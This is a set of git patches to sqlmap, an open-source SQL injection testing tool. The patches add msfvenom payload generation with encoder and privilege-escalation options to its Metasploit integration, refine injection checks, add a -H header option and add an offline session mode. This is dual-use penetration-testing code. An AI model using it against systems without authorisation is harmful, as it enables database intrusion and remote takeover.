@@ -63,6 +64,7 @@ class Metasploit:
         self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
         self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
         self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
+        self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))
 
         if IS_WIN:
             _ = conf.msfPath
@@ -78,6 +80,7 @@ class Metasploit:
             self._msfCli = "%s & ruby %s" % (_, self._msfCli)
             self._msfEncode = "ruby %s" % self._msfEncode
             self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
+            self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
 
         self._msfPayloadsList = {
                                       "windows": {
@@ -361,7 +364,11 @@ class Metasploit:
         self._cliCmd += " E"
 
     def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
-        self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr)
+        if kb.msfVenom:
+            self._payloadCmd = "%s -p" % self._msfVenom
+        else:
+            self._payloadCmd = self._msfPayload
+        self._payloadCmd += " %s" % self.payloadConnStr
         self._payloadCmd += " EXITFUNC=%s" % exitfunc
         self._payloadCmd += " LPORT=%s" % self.portStr
 
@@ -373,13 +380,22 @@ class Metasploit:
         if Backend.isOs(OS.LINUX) and conf.privEsc:
             self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
 
-        if extra == "BufferRegister=EAX":
-            self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
+        if kb.msfVenom:
+            if extra == "BufferRegister=EAX":
+                self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
 
-            if extra is not None:
-                self._payloadCmd += " %s" % extra
+                if extra is not None:
+                    self._payloadCmd += " %s" % extra
+            else:
+                self._payloadCmd += " -f exe > \"%s\"" % outFile
         else:
-            self._payloadCmd += " X > \"%s\"" % outFile
+            if extra == "BufferRegister=EAX":
+                self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
+
+                if extra is not None:
+                    self._payloadCmd += " %s" % extra
+            else:
+                self._payloadCmd += " X > \"%s\"" % outFile
 
     def _runMsfCliSmbrelay(self):
         self._forgeMsfCliCmdForSmbrelay()

From 1f71d809d42ada25eb2adcf491a908709eef0f59 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 3 Jul 2015 08:55:33 +0200
Subject: [PATCH 445/492] Fixes #1288

---
 lib/controller/checks.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 14d93936d..718b4e17f 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -706,7 +706,8 @@ def checkFalsePositives(injection):
 
     retVal = injection
 
-    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data):
+    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
+      (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
         pushValue(kb.injection)
 
         infoMsg = "checking if the injection point on %s " % injection.place

From 166dc98e812dcd978c1d177000a1a607d2193f6d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 5 Jul 2015 00:03:29 +0200
Subject: [PATCH 446/492] Minor patch

---
 lib/core/agent.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 59c361455..ad812f217 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -68,7 +68,7 @@ class Agent(object):
 
         return query
 
-    def payload(self, place=None, parameter=None, value=None, newValue=None, where=None):
+    def payload(self, place=None, parameter=None, value=None, newValue="", where=None):
         """
         This method replaces the affected parameter with the SQL
         injection statement to request

From 96327b6701eb8605c27b85d27fa1c008e2714aef Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 5 Jul 2015 01:47:01 +0200
Subject: [PATCH 447/492] Fixes #1290

---
 lib/controller/checks.py | 9 ++++++---
 lib/core/agent.py        | 2 +-
 2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 718b4e17f..aa4ee4f29 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -386,9 +386,12 @@ def checkSqlInjection(place, parameter, value):
                     # Forge request payload by prepending with boundary's
                     # prefix and appending the boundary's suffix to the
                     # test's ' <payload><comment> ' string
-                    boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
-                    boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
-                    reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+                    if fstPayload:
+                        boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
+                        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
+                        reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+                    else:
+                        reqPayload = None
 
                     # Perform the test's request and check whether or not the
                     # payload was successful
diff --git a/lib/core/agent.py b/lib/core/agent.py
index ad812f217..59c361455 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -68,7 +68,7 @@ class Agent(object):
 
         return query
 
-    def payload(self, place=None, parameter=None, value=None, newValue="", where=None):
+    def payload(self, place=None, parameter=None, value=None, newValue=None, where=None):
         """
         This method replaces the affected parameter with the SQL
         injection statement to request

From 6a1b3895f9f808fdc1cb63a07f43eda5c524bbbc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 6 Jul 2015 11:50:59 +0200
Subject: [PATCH 448/492] Patch for an Issue #1285

---
 lib/core/target.py | 96 ++++++++++++++++++++++++++--------------------
 1 file changed, 55 insertions(+), 41 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 90d2a68bd..0fb70769c 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -80,6 +80,7 @@ def _setRequestParams():
         return
 
     testableParameters = False
+    skipHeaders = False
 
     # Perform checks on GET parameters
     if conf.parameters.get(PLACE.GET):
@@ -123,11 +124,17 @@ def _setRequestParams():
             else:
                 kb.processUserMarks = not test or test[0] not in ("n", "N")
 
-                if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in conf.data:
-                    warnMsg = "it seems that you've provided empty parameter value(s) "
-                    warnMsg += "for testing. Please, always use only valid parameter values "
-                    warnMsg += "so sqlmap could be able to run properly"
-                    logger.warn(warnMsg)
+                if kb.processUserMarks:
+                    skipHeaders = True
+
+                    conf.parameters.clear()
+                    conf.paramDict.clear()
+
+                    if "=%s" % CUSTOM_INJECTION_MARK_CHAR in conf.data:
+                        warnMsg = "it seems that you've provided empty parameter value(s) "
+                        warnMsg += "for testing. Please, always use only valid parameter values "
+                        warnMsg += "so sqlmap could be able to run properly"
+                        logger.warn(warnMsg)
 
         if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
             if re.search(JSON_RECOGNITION_REGEX, conf.data):
@@ -241,11 +248,17 @@ def _setRequestParams():
                 else:
                     kb.processUserMarks = not test or test[0] not in ("n", "N")
 
-                    if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
-                        warnMsg = "it seems that you've provided empty parameter value(s) "
-                        warnMsg += "for testing. Please, always use only valid parameter values "
-                        warnMsg += "so sqlmap could be able to run properly"
-                        logger.warn(warnMsg)
+                    if kb.processUserMarks:
+                        skipHeaders = True
+
+                        conf.parameters.clear()
+                        conf.paramDict.clear()
+
+                        if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
+                            warnMsg = "it seems that you've provided empty parameter value(s) "
+                            warnMsg += "for testing. Please, always use only valid parameter values "
+                            warnMsg += "so sqlmap could be able to run properly"
+                            logger.warn(warnMsg)
 
             if not kb.processUserMarks:
                 if place == PLACE.URI:
@@ -304,49 +317,50 @@ def _setRequestParams():
             if conf.get(item):
                 conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "")
 
-    # Perform checks on Cookie parameters
-    if conf.cookie:
-        conf.parameters[PLACE.COOKIE] = conf.cookie
-        paramDict = paramToDict(PLACE.COOKIE, conf.cookie)
+    if not skipHeaders:
+        # Perform checks on Cookie parameters
+        if conf.cookie:
+            conf.parameters[PLACE.COOKIE] = conf.cookie
+            paramDict = paramToDict(PLACE.COOKIE, conf.cookie)
 
-        if paramDict:
-            conf.paramDict[PLACE.COOKIE] = paramDict
-            testableParameters = True
+            if paramDict:
+                conf.paramDict[PLACE.COOKIE] = paramDict
+                testableParameters = True
 
-    # Perform checks on header values
-    if conf.httpHeaders:
-        for httpHeader, headerValue in conf.httpHeaders:
-            # Url encoding of the header values should be avoided
-            # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
+        # Perform checks on header values
+        if conf.httpHeaders:
+            for httpHeader, headerValue in conf.httpHeaders:
+                # Url encoding of the header values should be avoided
+                # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
 
-            httpHeader = httpHeader.title()
+                httpHeader = httpHeader.title()
 
-            if httpHeader == HTTP_HEADER.USER_AGENT:
-                conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
+                if httpHeader == HTTP_HEADER.USER_AGENT:
+                    conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
 
-                condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES)))
+                    condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES)))
 
-                if condition:
-                    conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
-                    testableParameters = True
+                    if condition:
+                        conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
+                        testableParameters = True
 
-            elif httpHeader == HTTP_HEADER.REFERER:
-                conf.parameters[PLACE.REFERER] = urldecode(headerValue)
+                elif httpHeader == HTTP_HEADER.REFERER:
+                    conf.parameters[PLACE.REFERER] = urldecode(headerValue)
 
-                condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES)))
+                    condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES)))
 
-                if condition:
-                    conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
-                    testableParameters = True
+                    if condition:
+                        conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
+                        testableParameters = True
 
-            elif httpHeader == HTTP_HEADER.HOST:
-                conf.parameters[PLACE.HOST] = urldecode(headerValue)
+                elif httpHeader == HTTP_HEADER.HOST:
+                    conf.parameters[PLACE.HOST] = urldecode(headerValue)
 
-                condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES)))
+                    condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES)))
 
-                if condition:
-                    conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue}
-                    testableParameters = True
+                    if condition:
+                        conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue}
+                        testableParameters = True
 
     if not conf.parameters:
         errMsg = "you did not provide any GET, POST and Cookie "

From f488377001ed3b9cb781f2b67a5adc5e1433108d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Jul 2015 08:47:07 +0200
Subject: [PATCH 449/492] Fixes #1293

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 60cadde7b..c2933ad1a 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -114,7 +114,7 @@ def cmdLineParser():
                            action="store_true",
                            help="Ignore Set-Cookie header from response")
 
-        request.add_option("--user-agent", dest="agent",
+        request.add_option("-H", "--user-agent", dest="agent",
                            help="HTTP User-Agent header value")
 
         request.add_option("--random-agent", dest="randomAgent",

From 2080fcaa37d886bbcd697409ff176840bc01110d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Jul 2015 09:24:16 +0200
Subject: [PATCH 450/492] Fixes #1293

---
 lib/core/common.py   |  2 +-
 lib/core/option.py   |  3 +++
 lib/parse/cmdline.py | 15 ++++++++++++++-
 3 files changed, 18 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 08e6cc46e..91029490b 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3285,7 +3285,7 @@ def expandMnemonics(mnemonics, parser, args):
                     pointer = pointer.next[char]
                     pointer.current.append(option)
 
-    for mnemonic in mnemonics.split(','):
+    for mnemonic in (mnemonics or "").split(','):
         found = None
         name = mnemonic.split('=')[0].replace("-", "").strip()
         value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
diff --git a/lib/core/option.py b/lib/core/option.py
index db7cb8c44..7097b9ac6 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1339,6 +1339,9 @@ def _setHTTPExtraHeaders():
         conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
 
         for headerValue in conf.headers:
+            if not headerValue.strip():
+                continue
+
             if headerValue.count(':') >= 1:
                 header, value = (_.lstrip() for _ in headerValue.split(":", 1))
 
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index c2933ad1a..a374b4fa5 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -114,7 +114,7 @@ def cmdLineParser():
                            action="store_true",
                            help="Ignore Set-Cookie header from response")
 
-        request.add_option("-H", "--user-agent", dest="agent",
+        request.add_option("--user-agent", dest="agent",
                            help="HTTP User-Agent header value")
 
         request.add_option("--random-agent", dest="randomAgent",
@@ -127,6 +127,9 @@ def cmdLineParser():
         request.add_option("--referer", dest="referer",
                            help="HTTP Referer header value")
 
+        request.add_option("-H", "--header", dest="header",
+                           help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")")
+
         request.add_option("--headers", dest="headers",
                            help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
 
@@ -799,6 +802,7 @@ def cmdLineParser():
         argv = []
         prompt = False
         advancedHelp = True
+        extraHeaders = []
 
         for arg in sys.argv:
             argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
@@ -860,6 +864,9 @@ def cmdLineParser():
         for i in xrange(len(argv)):
             if argv[i] == "-hh":
                 argv[i] = "-h"
+            elif argv[i] == "-H":
+                if i + 1 < len(argv):
+                    extraHeaders.append(argv[i + 1])
             elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
                 argv[i] = argv[i][:-1]
                 conf.skipThreadCheck = True
@@ -888,6 +895,12 @@ def cmdLineParser():
                 print "\n[!] to see full list of options run with '-hh'"
             raise
 
+        if extraHeaders:
+            if not args.headers:
+                args.headers = ""
+            delimiter = "\\n" if "\\n" in args.headers else "\n"
+            args.headers += delimiter + delimiter.join(extraHeaders)
+
         # Expand given mnemonic options (e.g. -z "ign,flu,bat")
         for i in xrange(len(argv) - 1):
             if argv[i] == "-z":

From 3a5cc989767d3371b08996345d2087902b31afff Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Jul 2015 09:27:18 +0200
Subject: [PATCH 451/492] -Z is/are a pseudo-option (just like -H) expanded
 during the run

---
 lib/core/optiondict.py | 1 -
 sqlmap.conf            | 3 ---
 2 files changed, 4 deletions(-)

diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 49eae9230..587db58b9 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -209,7 +209,6 @@ optDict = {
                              },
 
             "Miscellaneous": {
-                               "mnemonics":         "string",
                                "alert":             "string",
                                "answers":           "string",
                                "beep":              "boolean",
diff --git a/sqlmap.conf b/sqlmap.conf
index 0fc5fb728..f9f30e759 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -715,9 +715,6 @@ updateAll = False
 
 [Miscellaneous]
 
-# Use short mnemonics (e.g. "flu,bat,ban,tec=EU").
-mnemonics =
-
 # Run host OS command(s) when SQL injection is found.
 alert =
 

From ca2f63c6725ed5651dc5037e6f6b0d104800792e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 00:37:59 +0200
Subject: [PATCH 452/492] Test speed up in case of boolean based blind

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index aa4ee4f29..3b1bc7f0d 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -426,7 +426,7 @@ def checkSqlInjection(place, parameter, value):
                             trueResult = Request.queryPage(reqPayload, place, raise404=False)
                             truePage = threadData.lastComparisonPage or ""
 
-                            if trueResult:
+                            if trueResult and truePage != falsePage:
                                 falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
 
                                 # Perform the test's False request

From 48b627f3ff5fc364d2e49450f88e3c64ac6076a4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 00:54:02 +0200
Subject: [PATCH 453/492] Prevent double tests (e.g. in same final tests where
 suffix is cut by the comment)

---
 lib/controller/checks.py | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 3b1bc7f0d..6949d3746 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -90,6 +90,7 @@ def checkSqlInjection(place, parameter, value):
 
     paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
     tests = getSortedInjectionTests()
+    seenPayload = set()
 
     while tests:
         test = tests.pop(0)
@@ -390,6 +391,11 @@ def checkSqlInjection(place, parameter, value):
                         boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
                         boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                         reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
+                        if reqPayload:
+                            if reqPayload in seenPayload:
+                                continue
+                            else:
+                                seenPayload.add(reqPayload)
                     else:
                         reqPayload = None
 

From 02470ea6832eafa121913ec339fcec9a164c92c5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 01:19:46 +0200
Subject: [PATCH 454/492] Further decreasing number of testing payloads

---
 lib/controller/checks.py | 11 +++++++++++
 lib/core/option.py       |  1 +
 2 files changed, 12 insertions(+)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 6949d3746..0cd4bbc82 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -525,6 +525,17 @@ def checkSqlInjection(place, parameter, value):
                                 infoMsg += "there is at least one other (potential) "
                                 infoMsg += "technique found"
                                 singleTimeLogMessage(infoMsg)
+                            elif not injection.data:
+                                _ = test.request.columns.split('-')[-1]
+                                if _.isdigit() and int(_) > 10:
+                                    if kb.futileUnion is None:
+                                        msg = "it is not recommended to perform "
+                                        msg += "extended UNION tests if there is not "
+                                        msg += "at least one other (potential) "
+                                        msg += "technique found. Do you want to skip? [Y/n] "
+                                        kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
+                                    if kb.futileUnion is False:
+                                        continue
 
                             # Test for UNION query SQL injection
                             reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
diff --git a/lib/core/option.py b/lib/core/option.py
index 7097b9ac6..c5b681d4b 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1788,6 +1788,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.followSitemapRecursion = None
     kb.forcedDbms = None
     kb.forcePartialUnion = False
+    kb.futileUnion = None
     kb.headersFp = {}
     kb.heuristicDbms = None
     kb.heuristicMode = False

From 9ff115ce71cc46df82a52303033ef3ef158148e3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 01:33:53 +0200
Subject: [PATCH 455/492] Minor patch

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 0cd4bbc82..b6901f923 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -432,7 +432,7 @@ def checkSqlInjection(place, parameter, value):
                             trueResult = Request.queryPage(reqPayload, place, raise404=False)
                             truePage = threadData.lastComparisonPage or ""
 
-                            if trueResult and truePage != falsePage:
+                            if trueResult and not(truePage == falsePage and not kb.nullConnection):
                                 falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)
 
                                 # Perform the test's False request

From 4baaa4a5ad1ea75e4826ee10f6b21412362d2394 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 09:24:14 +0200
Subject: [PATCH 456/492] Minor improvement

---
 lib/controller/checks.py | 9 +++++++--
 lib/core/option.py       | 1 +
 2 files changed, 8 insertions(+), 2 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index b6901f923..8bb320531 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1015,11 +1015,15 @@ def checkStability():
     like for instance string matching (--string).
     """
 
-    infoMsg = "testing if the target URL is stable. This can take a couple of seconds"
+    infoMsg = "testing if the target URL is stable. This can take up to a second"
     logger.info(infoMsg)
 
     firstPage = kb.originalPage  # set inside checkConnection()
-    time.sleep(1)
+
+    delay = 1 - (time.time() - (kb.originalPageTime or 0))
+    delay = max(0, min(1, delay))
+    time.sleep(delay)
+
     secondPage, _ = Request.queryPage(content=True, raise404=False)
 
     if kb.redirectChoice:
@@ -1306,6 +1310,7 @@ def checkConnection(suppressOutput=False):
     try:
         page, _ = Request.queryPage(content=True, noteResponseTime=False)
         kb.originalPage = kb.pageTemplate = page
+        kb.originalPageTime = time.time()
 
         kb.errorIsNone = False
 
diff --git a/lib/core/option.py b/lib/core/option.py
index c5b681d4b..97f211e17 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1819,6 +1819,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.orderByColumns = None
     kb.originalCode = None
     kb.originalPage = None
+    kb.originalPageTime = None
     kb.originalTimeDelay = None
     kb.originalUrls = dict()
 

From 0ba264bfa0d1d7ea6c0a7919d7499e5bea356784 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 09:51:11 +0200
Subject: [PATCH 457/492] Minor patch

---
 lib/controller/checks.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 8bb320531..59c0c2969 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1015,7 +1015,7 @@ def checkStability():
     like for instance string matching (--string).
     """
 
-    infoMsg = "testing if the target URL is stable. This can take up to a second"
+    infoMsg = "testing if the target URL is stable. Delay can take up to a second"
     logger.info(infoMsg)
 
     firstPage = kb.originalPage  # set inside checkConnection()
@@ -1308,9 +1308,9 @@ def checkConnection(suppressOutput=False):
         logger.info(infoMsg)
 
     try:
+        kb.originalPageTime = time.time()
         page, _ = Request.queryPage(content=True, noteResponseTime=False)
         kb.originalPage = kb.pageTemplate = page
-        kb.originalPageTime = time.time()
 
         kb.errorIsNone = False
 

From 9bdbdc136f38ef5a1f80e4d735c05197847d0331 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 11:33:12 +0200
Subject: [PATCH 458/492] Minor cosmetics update

---
 lib/controller/controller.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 3fb86150d..90043a5b0 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -155,8 +155,11 @@ def _formatInjection(inj):
     return data
 
 def _showInjections():
-    header = "sqlmap identified the following injection points with "
-    header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    if kb.testQueryCount > 0:
+        header = "sqlmap identified the following injection point(s) with "
+        header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    else:
+        header = "sqlmap resumed the following injection point(s) from stored session"
 
     if hasattr(conf, "api"):
         conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)

From 10f8c6a0b6a44328caa83d8c9b5895332d5f62f7 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 16:10:24 +0200
Subject: [PATCH 459/492] Introducing --offline switch (to perform session only
 lookups)

---
 lib/controller/checks.py | 8 ++++----
 lib/core/optiondict.py   | 1 +
 lib/parse/cmdline.py     | 4 ++++
 lib/request/connect.py   | 4 +++-
 lib/request/inject.py    | 2 +-
 sqlmap.conf              | 4 ++++
 6 files changed, 17 insertions(+), 6 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 59c0c2969..4c1e14c7e 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -552,7 +552,7 @@ def checkSqlInjection(place, parameter, value):
 
                         kb.previousMethod = method
 
-                        if conf.dummy:
+                        if conf.dummy or conf.offline:
                             injectable = False
 
                     # If the injection test was successful feed the injection
@@ -1142,7 +1142,7 @@ def checkWaf():
     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
     """
 
-    if any((conf.string, conf.notString, conf.regexp)):
+    if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)):
         return None
 
     dbmMsg = "heuristically checking if the target is protected by "
@@ -1290,7 +1290,7 @@ def checkNullConnection():
     return kb.nullConnection is not None
 
 def checkConnection(suppressOutput=False):
-    if not any((conf.proxy, conf.tor, conf.dummy)):
+    if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
         try:
             debugMsg = "resolving hostname '%s'" % conf.hostname
             logger.debug(debugMsg)
@@ -1303,7 +1303,7 @@ def checkConnection(suppressOutput=False):
             errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getUnicode(ex))
             raise SqlmapConnectionException(errMsg)
 
-    if not suppressOutput and not conf.dummy:
+    if not suppressOutput and not conf.dummy and not conf.offline:
         infoMsg = "testing connection to the target URL"
         logger.info(infoMsg)
 
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 587db58b9..b9adbd67b 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -217,6 +217,7 @@ optDict = {
                                "disableColoring":   "boolean",
                                "googlePage":        "integer",
                                "mobile":            "boolean",
+                               "offline":           "boolean",
                                "pageRank":          "boolean",
                                "purgeOutput":       "boolean",
                                "smart":             "boolean",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index a374b4fa5..177cb063e 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -715,6 +715,10 @@ def cmdLineParser():
                                   action="store_true",
                                   help="Imitate smartphone through HTTP User-Agent header")
 
+        miscellaneous.add_option("--offline", dest="offline",
+                                  action="store_true",
+                                  help="Work in offline mode (only use session data)")
+
         miscellaneous.add_option("--page-rank", dest="pageRank",
                                   action="store_true",
                                   help="Display page rank (PR) for Google dork results")
diff --git a/lib/request/connect.py b/lib/request/connect.py
index b3fe886f1..94d1e4576 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -212,7 +212,9 @@ class Connect(object):
         elif conf.cpuThrottle:
             cpuThrottle(conf.cpuThrottle)
 
-        if conf.dummy:
+        if conf.offline:
+            return None, None, None
+        elif conf.dummy:
             return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
 
         threadData = getCurrentThreadData()
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 0395c0a56..74d83efc9 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -450,7 +450,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
 
     kb.safeCharEncode = False
 
-    if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
+    if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
         warnMsg = "in case of continuous data retrieval problems you are advised to try "
         warnMsg += "a switch '--no-cast' "
         warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
diff --git a/sqlmap.conf b/sqlmap.conf
index f9f30e759..2ca8c6dd6 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -754,6 +754,10 @@ identifyWaf = False
 # Valid: True or False
 mobile = False
 
+# Work in offline mode (only use session data)
+# Valid: True or False
+offline = False
+
 # Display page rank (PR) for Google dork results.
 # Valid: True or False
 pageRank = False

